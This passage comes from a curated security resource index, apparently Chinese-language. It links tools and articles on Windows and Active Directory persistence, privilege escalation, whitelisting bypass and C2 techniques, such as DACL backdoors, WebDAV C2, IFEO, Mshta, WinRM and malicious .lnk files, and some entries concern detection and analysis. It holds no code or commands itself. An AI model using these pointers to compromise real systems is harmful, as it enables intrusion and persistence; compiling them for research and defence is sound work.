id="04794a1f53e595fb81288e7f9a3ac1d4"></a>文章 - 2019.10 [HackersOnBoard] [Black Hat USA 2017 An ACE Up the Sleeve Designing Active Directory DACL Backdoors](https://www.youtube.com/watch?v=sHMo2QJmpE0) - 2019.04 [nsfocus] [【M01N】CVE-2019-0841 DACL权限覆盖本地提权漏洞攻击分析](http://blog.nsfocus.net/cve-2019-0841-dacl/) - 2019.04 [aliyun] [CVE-2019-0841:Windows DACL权限覆写权限提升漏洞](https://xz.aliyun.com/t/4784) - 2017.08 [stealthbits] [From Botnets to DACL Backdoors: A Journey through Modern Active Directory Attacks – Part I](https://blog.stealthbits.com/from-botnets-to-dacl-backdoors-a-journey-through-modern-active-directory-attacks-part-i) - 2014.04 [secureidentity] [ACL, DACL, SACL and the ACE](https://secureidentity.se/acl-dacl-sacl-and-the-ace/) - 2013.11 [freebuf] [枚举和分析Windows DACLs工具 – WindowsDACLEnumProject](http://www.freebuf.com/sectool/16251.html) *** ## <a id="84f437e82aae8bfcecd2694e04fcf8aa"></a>WebDAV ### <a id="eb4696a47c7673522fd42c2a6e7cd8a7"></a>工具 - [**465**星][23d] [C++] [winscp/winscp](https://github.com/winscp/winscp) WinSCP is a popular free SFTP and FTP client for Windows, a powerful file manager that will improve your productivity. It supports also Amazon S3, FTPS, SCP and WebDAV protocols. Power users can automate WinSCP using .NET assembly. - [**373**星][2m] [Py] [mar10/wsgidav](https://github.com/mar10/wsgidav) A generic and extendable WebDAV server based on WSGI ### <a id="869dec888564b2d2d13708bebbcc3f74"></a>文章 - 2019.06 [n00py] [Understanding UNC paths, SMB, and WebDAV](https://www.n00py.io/2019/06/understanding-unc-paths-smb-and-webdav/) - 2019.04 [hackingarticles] [Command & Control: WebDav C2](https://www.hackingarticles.in/command-control-webdav-c2/) - 2019.02 [sans] [Scanning for WebDAV PROPFIND Exploiting CVE-2017-7269](https://isc.sans.edu/forums/diary/Scanning+for+WebDAV+PROPFIND+Exploiting+CVE20177269/24600/) - 2018.06 [trustedsec] [How to Set Up a Quick, Simple WebDAV Server for Remote File Sharing](https://www.trustedsec.com/2018/06/how-to-set-up-a-quick-simple-webdav-server-for-remote-file-sharing/) - 2017.09 [360] [利用WebDAV特性建立隐蔽后门](https://www.anquanke.com/post/id/86894/) - 2017.09 [pentestlab] [Command and Control – WebDAV](https://pentestlab.blog/2017/09/12/command-and-control-webdav/) - 2017.09 [arno0x0x] [Using WebDAV features as a covert channel](https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/) - 2017.03 [aliyun] [IIS 6.0 WebDAV远程代码执行漏洞分析—【CVE-2017-7269】](https://xz.aliyun.com/t/213) - 2016.11 [blackhillsinfosec] [Deploying a WebDAV Server](https://www.blackhillsinfosec.com/deploying-a-webdav-server/) - 2016.08 [hackingarticles] [Get Admin Access of Remote Windows PC using MS16-016 mrxdav.sys WebDav Escalation](http://www.hackingarticles.in/get-admin-access-remote-windows-pc-using-ms16-016-mrxdav-sys-webdav-escalation/) - 2016.03 [freebuf] [微软“WebDAV”提权漏洞(cve-2016-0051)初探](http://www.freebuf.com/vuls/98486.html) - 2016.02 [avfisher] [WebDAV本地提权漏洞(CVE-2016-0051/MS16-016)之交互式提权EXP](http://avfisher.win/archives/410) - 2016.02 [360] [WebDAV本地提权漏洞(CVE-2016-0051)POC & EXP](https://www.anquanke.com/post/id/83483/) - 2016.02 [freebuf] [Windows最新“WebDAV”提权漏洞介绍(MS16-016)](http://www.freebuf.com/vuls/95950.html) - 2011.07 [firebitsbr] [DAVTest: Teste rápido e exploits para WebDAV Servers](https://firebitsbr.wordpress.com/2011/07/13/769/) - 2010.07 [sans] [LNK vulnerability now with Metasploit module implementing the WebDAV method](https://isc.sans.edu/forums/diary/LNK+vulnerability+now+with+Metasploit+module+implementing+the+WebDAV+method/9199/) - 2009.05 [holisticinfosec] [WebTuff checks for WebDAV vulnerability](https://holisticinfosec.blogspot.com/2009/05/webtuff-checks-for-webdav-vulnerability.html) - 2009.05 [sans] [IIS admins, help finding WebDAV remotely using nmap](https://isc.sans.edu/forums/diary/IIS+admins+help+finding+WebDAV+remotely+using+nmap/6436/) - 2009.05 [skullsecurity] [WebDAV Detection, Vulnerability Checking and Exploitation](https://blog.skullsecurity.org/2009/webdav-detection-vulnerability-checking-and-exploitation) - 2009.05 [microsoft] [Answers to the IIS WebDAV authentication bypass questions](https://msrc-blog.microsoft.com/2009/05/20/answers-to-the-iis-webdav-authentication-bypass-questions/) *** ## <a id="9c71937ab7d82876aac2c54c150791cc"></a>Group Policy Object(GPO) ### <a id="578d958b7bb54c88abdf496c6e30647b"></a>工具 - [**246**星][16d] [C#] [fsecurelabs/sharpgpoabuse](https://github.com/FSecureLABS/SharpGPOAbuse) take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO. ### <a id="c468de52ae51e1caca7a00483464dd72"></a>文章 - 2019.04 [stealthbits] [How to Backup and Recover Group Policy Objects](https://blog.stealthbits.com/how-to-backup-and-recover-group-policy-objects/) - 2016.07 [stealthbits] [Comprehensive Auditing and Protection For Group Policy Objects](https://blog.stealthbits.com/comprehensive-auditing-protection-group-policy-objects) - 2015.03 [darkoperator] [Updating Group Policy Objects Remotely](https://www.darkoperator.com/blog/2015/3/9/updating-group-policy-objects-remotely) - 2013.08 [jaapbrasser] [Active Directory Friday: Query Group Policy Objects in Active Directory](https://www.jaapbrasser.com/active-directory-friday-query-group-policy-objects-in-active-directory/) *** ## <a id="6b68cefbacf54a6f75ca2f9018117a33"></a>AppInit/AppCert ### <a id="296d6cf1fb87b343a3084344c76d59ac"></a>文章 - 2020.01 [pentestlab] [Persistence – AppInit DLLs](https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/) - 2017.03 [toddcullumresearch] [Inline Hook of a System Call via AppInit_DLLs Part 2– The Hook](https://toddcullumresearch.com/2017/03/29/inline-hook-of-a-system-call-via-appinit_dlls-part-2-the-hook/) - 2017.03 [toddcullumresearch] [Inline Hook of a System Call via AppInit_DLLs Part 1 – Decryption of XOR Cipher](https://toddcullumresearch.com/2017/03/26/inline-hook-of-a-system-call-via-appinit_dlls/) - 2016.05 [pediy] [[原创]AppInit注入的那些事](https://bbs.pediy.com/thread-210371.htm) *** ## <a id="8f547f4f2f1e71c746324e72861c43f1"></a>InstallUtil ### <a id="b05e41c16bfafb2f11a5cab1d79b9460"></a>文章 - 2017.08 [tyranidslair] [DG on Windows 10 S: Abusing InstallUtil](https://www.tiraniddo.dev/2017/08/dg-on-windows-10-s-abusing-installutil.html) *** ## <a id="70f540d5729edd9eaf458082acdb22bc"></a>Image File Execution Option(IFEO) ### <a id="16ffb3bcd11332055eb2adab920dff34"></a>文章 - 2020.01 [pentestlab] [Persistence – Image File Execution Options Injection](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) - 2018.07 [360] [隐蔽后门——Image File Execution Options新玩法](https://www.anquanke.com/post/id/151425/) - 2015.12 [malwarebytes] [An Introduction to Image File Execution Options](https://blog.malwarebytes.com/101/2015/12/an-introduction-to-image-file-execution-options/) - 2012.09 [] [通过IFEO劫持提权](http://www.91ri.org/4224.html) - 2008.02 [sans] [Abusing Image File Execution Options](https://isc.sans.edu/forums/diary/Abusing+Image+File+Execution+Options/4039/) *** ## <a id="3dc4542422de4f6e2a8ea5d4f36e2481"></a>Mshta ### <a id="ec9ec7966300b8a41b394dd5cfbed4c7"></a>文章 - 2019.07 [mcafee] [What Is Mshta, How Can It Be Used and How to Protect Against It](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/) - 2019.07 [mcafee] [What Is Mshta, How Can It Be Used and How to Protect Against It](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/) - 2019.01 [hackingarticles] [Bypass Application Whitelisting using mshta.exe (Multiple Methods)](https://www.hackingarticles.in/bypass-application-whitelisting-using-mshta-exe-multiple-methods/) - 2017.12 [freebuf] [浅谈一下mshta在CVE-2017-11882里的命令构造](http://www.freebuf.com/articles/web/155304.html) - 2017.11 [conscioushacker] [Application Whitelisting Bypass: mshta.exe](https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-mshta-exe/) - 2016.06 [evi1cg] [Exec Commands Via Mshta.exe](https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html) *** ## <a id="8722d46369d07d677ad27d467c45e174"></a>Microsoft HTML Application(HTA) ### <a id="77e8c723a9f3e2b1df9b7778947c3400"></a>文章 - 2015.08 [redcanary] [Microsoft HTML Application (HTA) Abuse, Part Deux](https://redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/) *** ## <a id="7d3e42507cd5aef335800a1ad2ef81f2"></a>NetShell ### <a id="8be076273c1e4f30dc40065080573125"></a>工具 ### <a id="bb3384e6aeb99870a31bc93c01f6a76e"></a>文章 - 2016.09 [360] [使用Netshell执行恶意DLL并实现对目标主机的持久化攻击](https://www.anquanke.com/post/id/84648/) *** ## <a id="4dad410f6466bbb44dd8f722a98b4542"></a>VBScript ### <a id="cb35c6d81a6e143b6a70680e8ef9e02d"></a>工具 - [**1615**星][12d] [Py] [zerosum0x0/koadic](https://github.com/zerosum0x0/koadic) 类似于Meterpreter、Powershell Empire 的post-exploitation rootkit,区别在于其大多数操作都是由 Windows 脚本主机 JScript/VBScript 执行 ### <a id="8d9d82756a32f13fcba26616b4f9aaf0"></a>文章 - 2019.12 [aliyun] [基于VBSCRIPT下16进制木马的IE浏览器BYPASS](https://xz.aliyun.com/t/6886) - 2019.11 [trustedsec] [Finding and Identifying JScript/VBScript Callable COM Objects](https://www.trustedsec.com/blog/finding-and-identifying-jscript-vbscript-callable-com-objects/) - 2019.10 [hexacorn] [Rundll32 with a vbscript: protocol](http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/) - 2019.10 [Kaspersky] [Exploit Prevention: VBScript Memory Corruption in IE](https://www.youtube.com/watch?v=sfqqTu1z_4w) - 2019.04 [trendmicro] [Analysis: Abuse of Custom Actions in Windows Installer MSI to Run Malicious JavaScript, VBScript, and PowerShell Scripts](https://blog.trendmicro.com/trendlabs-security-intelligence/analysis-abuse-of-custom-actions-in-windows-installer-msi-to-run-malicious-javascript-vbscript-and-powershell-scripts/) - 2019.04 [4hou] [VBScript引擎堆溢出远程代码执行漏洞分析(CVE-2019-0666)](https://www.4hou.com/vulnerable/17250.html) - 2019.02 [360] [VBScript in 2018](https://www.anquanke.com/post/id/170727/) - 2019.01 [pediy] [IE VBScript 漏洞之CVE-2018-8174](https://bbs.pediy.com/thread-248930.htm) - 2019.01 [pediy] [IE VBScript 漏洞之CVE-2014-6332](https://bbs.pediy.com/thread-248925.htm) - 2018.12 [googleprojectzero] [ProjectZero关于VBScript安全性的探讨](https://googleprojectzero.blogspot.com/2018/12/on-vbscript.html) - 2018.12 [freebuf] [Windows VBScript引擎远程执行代码漏洞之CVE-2018-8373分析与复现](https://www.freebuf.com/vuls/190601.html) - 2018.11 [360] [Windows VBScript引擎远程执行代码漏洞 之CVE-2018-8373分析与复现](https://www.anquanke.com/post/id/166581/) - 2018.11 [4hou] [Windows VBScript引擎远程执行代码漏洞之CVE-2018-8373分析与复现](http://www.4hou.com/vulnerable/14733.html) - 2018.11 [360] [VBScript引擎远程代码执行漏洞之CVE-2018-8174分析与利用(更新)](https://www.anquanke.com/post/id/164493/) - 2018.11 [4hou] [Windows VBScript引擎远程执行代码漏洞之CVE-2018-8174分析与利用](http://www.4hou.com/vulnerable/14529.html) - 2018.11 [360] [Windows VBScript引擎RCE漏洞之CVE-2018-8174分析与利用](https://www.anquanke.com/post/id/163841/) - 2018.09 [paloaltonetworks] [Traps Prevents In-The-Wild VBScript Zero-Day Exploit in Internet](https://unit42.paloaltonetworks.com/unit42-traps-prevents-wild-vbscript-zero-day-exploit-internet-explorer/) - 2018.08 [aliyun] [CVE-2018-8373:VBScript引擎UAF漏洞](https://xz.aliyun.com/t/2588) - 2018.08 [trendmicro] [Use-after-free (UAF) Vulnerability CVE-2018-8373 in VBScript Engine Affects Internet Explorer to Run Shellcode](https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/) - 2018.07 [360] [Analysis of the new exploitable issues with CVE-2018-8174 patch and VBScript zero-day vulnerability](https://blog.360totalsecurity.com/en/analysis-of-the-new-exploitable-issues-with-cve-2018-8174-patch-and-vbscript-zero-day-exploit/) *** ## <a id="ded9537532637d9e8cf34103b8074bb9"></a>VBA ### <a id="80b5cac54622fc99de46e2de95f2d187"></a>工具 - [**565**星][2m] [Py] [decalage2/vipermonkey](https://github.com/decalage2/vipermonkey) A VBA parser and emulation engine to analyze malicious macros. - [**262**星][7m] [Py] [bontchev/pcodedmp](https://github.com/bontchev/pcodedmp) A VBA p-code disassembler - [**226**星][8m] [Py] [malwarecantfly/vba2graph](https://github.com/malwarecantfly/vba2graph) Generate call graphs from VBA code, for easier analysis of malicious documents. ### <a id="24e894db7a4d419a9b186cd5546fdcd2"></a>文章 - 2019.10 [marcoramilli] [Frequent VBA Macros used in Office Malware](https://marcoramilli.com/2019/10/01/frequent-vba-macros-used-in-office-malware/) - 2019.06 [freebuf] [Matlab加上VBA编程,表格就能画画了](https://www.freebuf.com/geek/206650.html) - 2019.06 [beny] [Weaponization: Howto Fully Undetectable Empire Powershell MS macro (VBA obfuscation & Stomping)](https://www.peerlyst.com/posts/weaponization-howto-fully-undetectable-empire-powershell-ms-macro-vba-obfuscation-and-stomping-beny-bertin) - 2019.05 [malcomvetter] [Choose Your Own Red Team Adventure: Processes from VBA Macro](https://medium.com/p/50d1a07a8c8b) - 2019.05 [sans] [VBA Office Document: Which Version?](https://isc.sans.edu/forums/diary/VBA+Office+Document+Which+Version/24902/) - 2019.04 [pcsxcetrasupport3] [A look at Stomped VBA code and the P-Code in a Word Document](https://pcsxcetrasupport3.wordpress.com/2019/04/25/a-look-at-stomped-vba-code-and-the-p-code-in-a-word-document/) - 2019.02 [lucasg] [Discovering Nvidia NvBackend endpoint](http://lucasg.github.io/2019/02/01/Discovering-Nvidia-NvBackend-endpoint/) - 2019.01 [pcsxcetrasupport3] [A deeper look into a wild VBA Macro](https://pcsxcetrasupport3.wordpress.com/2019/01/26/a-deeper-look-into-a-wild-vba-macro/) - 2018.12 [freebuf] [Vba2Graph:一款通过VBA代码分析恶意软件的强大工具(带GUI)](https://www.freebuf.com/sectool/191430.html) - 2018.12 [DoktorCranium] [NetBSD evbarm Pinebook video test](https://www.youtube.com/watch?v=6Fv5D4Pl2SY) - 2018.11 [ironcastle] [ViperMonkey: VBA maldoc deobfuscation, (Mon, Nov 26th)](https://www.ironcastle.net/vipermonkey-vba-maldoc-deobfuscation-mon-nov-26th/) - 2018.11 [sans] [ViperMonkey: VBA maldoc deobfuscation](https://isc.sans.edu/forums/diary/ViperMonkey+VBA+maldoc+deobfuscation/24346/) - 2018.11 [vkremez] [Let's Learn: In-Depth Review of FIN7 VBA Macro & Lightweight JavaScript Backdoor](https://www.vkremez.com/2018/11/in-depth-review-of-fin7-vba-macro.html) - 2018.11 [hexacorn] [使用VBA/VBS分析Word文档](http://www.hexacorn.com/blog/2018/11/16/analyzing-word-documents-via-vba-vbs/) - 2018.10 [aliyun] [攻击者是如何隐藏恶意VBA 代码行为的](https://xz.aliyun.com/t/2898) - 2018.08 [ColinHardy] [Analysing Obfuscated VBA - Extracting indicators from a Trickbot downloader](https://www.youtube.com/watch?v=auB7mkwfHrk) - 2018.05 [scrt] [Insomni’hack 2018 – vba03-strikeBack writeup](https://blog.scrt.ch/2018/05/04/insomnihack-2018-vba03-strikeback-writeup/) - 2018.04 [dist67] [VBA Maldoc: Form-Embedded PE File](https://www.youtube.com/watch?v=sLz_O2h8i74) - 2018.04 [virusbulletin] [New paper: Powering the distribution of Tesla stealer with PowerShell and VBA macros](https://www.virusbulletin.com/blog/2018/04/new-paper-powering-distribution-tesla-stealer-powershell-and-vba-macros/) - 2018.04 [pentestingexperts] [ViperMonkey v0.06 released: A VBA parser and emulation engine to analyze malicious macros](http://www.pentestingexperts.com/vipermonkey-v0-06-released-a-vba-parser-and-emulation-engine-to-analyze-malicious-macros/) *** ## <a id="fdaecf463cde0ace2baf674360118a19"></a>Security Service Provider(SSP) ### <a id="ca71d3c8c759ef191253380e005213c0"></a>文章 - 2018.05 [ensilo] [Customers Say It Best - Managed Security Service Provider](https://blog.ensilo.com/managed-security-service-provider) - 2018.05 [infosecinstitute] [What is the DoD CSSP (Cyber Security Service Provider)?](http://resources.infosecinstitute.com/dod-cssp-cyber-security-service-provider/) - 2018.03 [nettitude] [Building a secure future – Cyber security service provider Nettitude joins the Lloyd’s Register group](https://blog.nettitude.com/nettitude-joins-the-lloyds-register-group) - 2017.09 [trustlook] [Trustlook Selected as 10 Best Security Service Providers of 2017](https://blog.trustlook.com/2017/09/05/trustlook-selected-as-10-best-security-service-providers-of-2017/) - 2017.09 [trustlook] [Trustlook Selected as 10 Best Security Service Providers of 2017](https://blog.trustlook.com/trustlook-selected-as-10-best-security-service-providers-of-2017/) - 2017.05 [fortinet] [Trends Affecting Managed Security Service Providers](https://www.fortinet.com/blog/industry-trends/trends-affecting-managed-security-service-providers.html) - 2017.03 [fortinet] [Managed Security Service Providers, Choosing the Right Security Vendor](https://www.fortinet.com/blog/industry-trends/managed-security-service-providers-choosing-the-right-security-vendor.html) - 2016.07 [fortinet] [Security Trends: Managed Security Service Providers](https://www.fortinet.com/blog/industry-trends/security-trends-managed-security-service-providers.html) *** ## <a id="cbe7925b4695d3f5e9f72f432a6530dc"></a>Scheduled Task ### <a id="f52a95e272df2e86c388e0dd076c4c6f"></a>工具 - [**432**星][1m] [Py] [sibson/redbeat](https://github.com/sibson/redbeat) RedBeat is a Celery Beat Scheduler that stores the scheduled tasks and runtime metadata in Redis. - [**385**星][1m] [C#] [dahall/taskscheduler](https://github.com/dahall/taskscheduler) Provides a .NET wrapper for the Windows Task Scheduler. It aggregates the multiple versions, provides an editor and allows for localization. ### <a id="85a4495e6c53b1f5de50d3cf42de1084"></a>文章 - 2019.11 [aliyun] [持久化研究-Scheduled Tasks](https://xz.aliyun.com/t/6822) - 2019.09 [markmotig] [Command prompt with System rights using Schtasks, Ncat and Metame](https://medium.com/p/d2d333a710aa) - 2019.06 [zerodayinitiative] [Exploiting the Windows Task Scheduler Through CVE-2019-1069](https://www.zerodayinitiative.com/blog/2019/6/11/exploiting-the-windows-task-scheduler-through-cve-2019-1069) - 2018.05 [ironcastle] [Adding Persistence Via Scheduled Tasks, (Mon, May 7th)](https://www.ironcastle.net/adding-persistence-via-scheduled-tasks-mon-may-7th/) - 2018.05 [sans] [Adding Persistence Via Scheduled Tasks](https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/) - 2016.05 [enigma0x3] [Userland Persistence with Scheduled Tasks and COM Handler Hijacking](https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and-com-handler-hijacking/) - 2015.04 [jaapbrasser] [New article on PowerShell Magazine: Retrieve scheduled tasks using Schedule.Service COMObject](https://www.jaapbrasser.com/new-article-on-powershell-magazine-retrieve-scheduled-tasks-using-schedule-service-comobject/) - 2015.03 [malwarebytes] [Scheduled Tasks](https://blog.malwarebytes.com/cybercrime/2015/03/scheduled-tasks/) - 2013.02 [mikefrobbins] [Use PowerShell to Create a Scheduled Task that Uses PowerShell to Pause and Resume AppAssure Core Replication](http://mikefrobbins.com/2013/02/07/use-powershell-to-create-a-scheduled-task-that-uses-powershell-to-pause-and-resume-appassure-core-replication/) *** ## <a id="0f90a8ce54f7bff9128b404dbab3d314"></a>Windows Remote Management(WinRM) ### <a id="a0fe36873097f6dff84cdd7b3fe52fb2"></a>工具 - [**708**星][13d] [Ruby] [hackplayers/evil-winrm](https://github.com/hackplayers/evil-winrm) 用户Hacking/渗透的终极WinRM shell - [**238**星][10d] [Go] [masterzen/winrm](https://github.com/masterzen/winrm) Windows远程命令执行,命令行工具+库,Go编写 ### <a id="c754ad3133666a921f924a0366fda9e0"></a>文章 - 2019.11 [hakin9] [Evil-WinRM: The ultimate WinRM shell for hacking/pentesting](https://hakin9.org/evil-winrm-the-ultimate-winrm-shell-for-hacking-pentesting/) - 2019.08 [freebuf] [evil-winrm:Windows远程管理(WinRM)Shell终极版](https://www.freebuf.com/sectool/210479.html) - 2018.07 [freebuf] [利用Winrm.vbs绕过白名单限制执行任意代码](http://www.freebuf.com/articles/system/178035.html) - 2018.07 [4hou] [如何使用winrm.vbs绕过应用白名单执行任意未签名代码](http://www.4hou.com/technology/12587.html) - 2018.07 [360] [使用 winrm.vbs 绕过应用白名单执行任意未签名代码](https://www.anquanke.com/post/id/151711/) - 2018.07 [aliyun] [利用winrm.vbs绕过应用程序白名单执行任意未签名代码](https://xz.aliyun.com/t/2444) - 2018.07 [mattifestation] [Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs](https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404) - 2018.06 [specterops] [Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs](https://medium.com/p/c8c24fb40404) - 2018.05 [pentestlab] [利用Windows远程管理服务实现横向渗透](https://pentestlab.blog/2018/05/15/lateral-movement-winrm/) - 2017.09 [trustedsec] [Using WinRM Through Meterpreter](https://www.trustedsec.com/2017/09/using-winrm-meterpreter/) - 2015.03 [darkoperator] [WinRM SSL Certificate Deployment via GPO](https://www.darkoperator.com/blog/2015/3/24/bdvjiiw1ybzfdjulc5pprgpkm8os0b) - 2014.12 [rsa] [Detecting APT Using Anomalous Windows Remote Management Methods and Dynamic RPC Endpoint Mapping](https://community.rsa.com/community/products/netwitness/blog/2014/12/22/detecting-apt-using-anomalous-windows-remote-management-methods-and-dynamic-rpc-endpoint-mapping) - 2014.07 [jaapbrasser] [Setting up PowerShell Remoting using winrm quickconfig or Enable-PSRemoting fails](https://www.jaapbrasser.com/setting-up-powershell-remoting-using-winrm-quickconfig-or-enable-psremoting-fails/) - 2013.03 [rapid7] [Whiteboard Wednesday - Abusing Windows Remote Management with Metasploit](https://blog.rapid7.com/2013/03/06/whiteboard-wednesday-abusing-windows-remote-management-with-metasploit/) - 2012.11 [rapid7] [Abusing Windows Remote Management (WinRM) with Metasploit](https://blog.rapid7.com/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit/) - 2012.10 [netspi] [Exploiting Trusted Hosts in WinRM](https://blog.netspi.com/exploiting-trusted-hosts-in-winrm/) *** ## <a id="567c09f34e35410dc959657beb4da4d3"></a>Control Panel ### <a id="2f0c44bd470537ea2924f941129ec965"></a>工具 ### <a id="62bd550f94a11d68207c58a1753479cc"></a>文章 - 2019.01 [cofense] [Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans](https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/) - 2016.12 [8090] [win10控制面板在哪_Win10控制面板打不开怎么解决](http://www.8090-sec.com/archives/5711) - 2016.08 [mcafee] [‘Cat-Loving’ Mobile Ransomware Operates With Control Panel](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cat-loving-mobile-ransomware-operates-control-panel/) - 2016.08 [mcafee] [‘Cat-Loving’ Mobile Ransomware Operates With Control Panel](https://securingtomorrow.mcafee.com/mcafee-labs/cat-loving-mobile-ransomware-operates-control-panel/) - 2015.06 [jaapbrasser] [Open Master Control Panel using PowerShell](https://www.jaapbrasser.com/open-master-control-panel-using-powershell/) - 2014.03 [trendmicro] [Anatomy of a Control Panel Malware Attack, Part 2](https://blog.trendmicro.com/trendlabs-security-intelligence/anatomy-of-a-control-panel-malware-attack-part-2/) - 2014.03 [trendmicro] [Anatomy of a Control Panel Malware Attack, Part 1](https://blog.trendmicro.com/trendlabs-security-intelligence/anatomy-of-a-control-panel-malware-attack-part-1/) - 2013.12 [] [LNMP ftp控制面板安装程式未删除的漏洞](http://0day5.com/archives/913/) - 2013.06 [securityblog] [Enable or Disable Control Panel](http://securityblog.gr/2358/enable-or-disable-control-panel/) - 2013.06 [sans] [Control Panel Forensics: Evidence of Time Manipulation and Moreâ¦](https://digital-forensics.sans.org/blog/2013/06/05/control-panel-forensics-evidence-of-time-manipulation-and-more) - 2012.03 [leehong2005] [Control Panel Applet 实现](https://blog.csdn.net/leehong2005/article/details/7334916) - 2011.10 [mikedoszhang] [Remove useless item form the Control Panel\All Control Panel Items](https://mikedoszhang.blogspot.com/2011/10/remove-useless-item-form-control.html) *** ## <a id="6bdc12478a16b13a33c7ecd353f967b1"></a>Windows Shortcut File ### <a id="4a28a030e4074a0d09d31f9cadf7378f"></a>工具 ### <a id="29bf70714f8426a6f7804e277cb7b378"></a>文章 - 2017.07 [sans] [Another .lnk File](https://isc.sans.edu/forums/diary/Another+lnk+File/22640/) - 2017.07 [sans] [Office maldoc + .lnk](https://isc.sans.edu/forums/diary/Office+maldoc+lnk/22618/) - 2017.04 [nviso] [如何从Word文档中提取.LNK文件,以及如何分析](https://blog.nviso.be/2017/04/04/tracking-threat-actors-through-lnk-files/) - 2017.03 [sentinelone] [Understanding The State of .LNK Files](https://www.sentinelone.com/blog/windows-shortcut-file-lnk-sneaking-malware/) - 2017.03 [nviso] [恶意文档内嵌的.LNK下载者分析](https://blog.nviso.be/2017/03/24/lnk-downloader-and-bitsadmin-exe-in-malicious-office-document/) - 2017.02 [myonlinesecurity] [various subject emails downloading .lnk files using PowerShell to download various malwares](https://myonlinesecurity.co.uk/various-subject-emails-downloading-lnk-files-using-powershell-to-download-various-malwares/) - 2016.10 [willgenovese] [tricky.lnk – Unicode Text Spoofing](http://willgenovese.com/tricky-lnk-unicode-text-spoofing/) - 2016.10 [microsoft] [The new .LNK between spam and Locky infection](https://cloudblogs.microsoft.com/microsoftsecure/2016/10/19/the-new-lnk-between-spam-and-locky-infection/) - 2016.10 [microsoft] [The new .LNK between spam and Locky infection](https://www.microsoft.com/security/blog/2016/10/19/the-new-lnk-between-spam-and-locky-infection/) - 2016.06 [onready] [Hijacking Windows hotkeys with .lnk file or Old horse raids](https://onready.me/hijacking_hotkey_or_old_horse_raids.html) - 2016.06 [onready] [Embedding reverse shell in .lnk file or Old horse attacks](https://onready.me/old_horse_attacks.html) - 2016.02 [sans] [Analyzis of a Malicious .lnk File with an Embedded Payload](https://isc.sans.edu/forums/diary/Analyzis+of+a+Malicious+lnk+File+with+an+Embedded+Payload/20763/) - 2016.02 [onready] [DOCX on fire: .lnk in docx](https://onready.me/lnk_in_docx.html) - 2010.07 [sans] [autorun.inf and .lnk Malware (NOT 'Vulnerability in Windows Shell Could Allow Remote Code Execution' 2286198)](https://isc.sans.edu/forums/diary/autoruninf+and+lnk+Malware+NOT+Vulnerability+in+Windows+Shell+Could+Allow+Remote+Code+Execution+2286198/9229/) - 2010.07 [sans] [Update on .LNK vulnerability](https://isc.sans.edu/forums/diary/Update+on+LNK+vulnerability/9217/) - 2010.04 [pediy] [[原创]windows平台.lnk文件感染技术研究](https://bbs.pediy.com/thread-110426.htm) *** ## <a id="09220acd8a80f802a330028acfd6454d"></a>Windows Explorer ### <a id="70a08a1d4ae425b9c2e2e336b832754a"></a>工具 ### <a id="97b6c206893c0d72beebd5c122542933"></a>文章 - 2018.08 [insert] [Leaking Environment Variables in Windows Explorer via .URL or desktop.ini files](https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html) - 2013.06 [securityblog] [Refresh all opened Windows Explorer windows](http://securityblog.gr/1646/refresh-all-opened-windows-explorer-windows/) - 2010.08 [rebootuser] [Mount a VMware vmdk (virtual disk) in Windows Explorer](https://www.rebootuser.com/?p=185) - 2006.08 [sans] [MS06-045: Windows Explorer Remote Code Excution Vulnerability](https://isc.sans.edu/forums/diary/MS06045+Windows+Explorer+Remote+Code+Excution+Vulnerability/1563/) *** ## <a id="4305fed600ce259233802ea6c6626887"></a>Application Shim ### <a id="10b9816b4775f22260658eef1d41860a"></a>文章 - 2020.01 [hackingarticles] [Windows Persistence using Application Shimming](https://www.hackingarticles.in/windows-persistence-using-application-shimming/) - 2019.06 [hshrzd] [Application shimming vs Import Table recovery](https://hshrzd.wordpress.com/2019/06/27/application-shimming-vs-import-table-recovery/) - 2018.11 [andreafortuna] [Process Injection and Persistence using Application Shimming](https://www.andreafortuna.org/dfir/malware-analysis/process-injection-and-persistence-using-application-shimming/) - 2018.03 [countercept] [Hunting for Application Shim Databases](https://countercept.com/our-thinking/hunting-for-application-shim-databases/) - 2018.03 [countercept] [Hunting for Application Shim Databases](https://countercept.com/blog/hunting-for-application-shim-databases/) - 2018.02 [redcanary] [Detecting Application Shimming: A Story About Continuous Improvement](https://redcanary.com/blog/detecting-application-shimming/) - 2016.08 [blacksunhackers] [Post Exploitation Persistence With Application Shims (Intro)](http://blacksunhackers.club/2016/08/post-exploitation-persistence-with-application-shims-intro/) *** ## <a id="061272d088606ae0778a04b31f3c0e46"></a>Squiblydoo ### <a id="1bd9e5df8902faae521e1dff195f2dbc"></a>文章 - 2019.03 [myonlinesecurity] [Trickbot via fake Efax message using Squiblydoo, Active X, macro and abusing pastebin](https://myonlinesecurity.co.uk/trickbot-via-fake-efax-message-using-squiblydoo-active-x-macro-and-abusing-pastebin/) - 2016.04 [rsa] [Detection of Squiblydoo COM+ Whitelist Bypassing with ECAT](https://community.rsa.com/community/products/netwitness/blog/2016/04/26/detection-of-com-whitelist-bypassing-with-ecat) *** ## <a 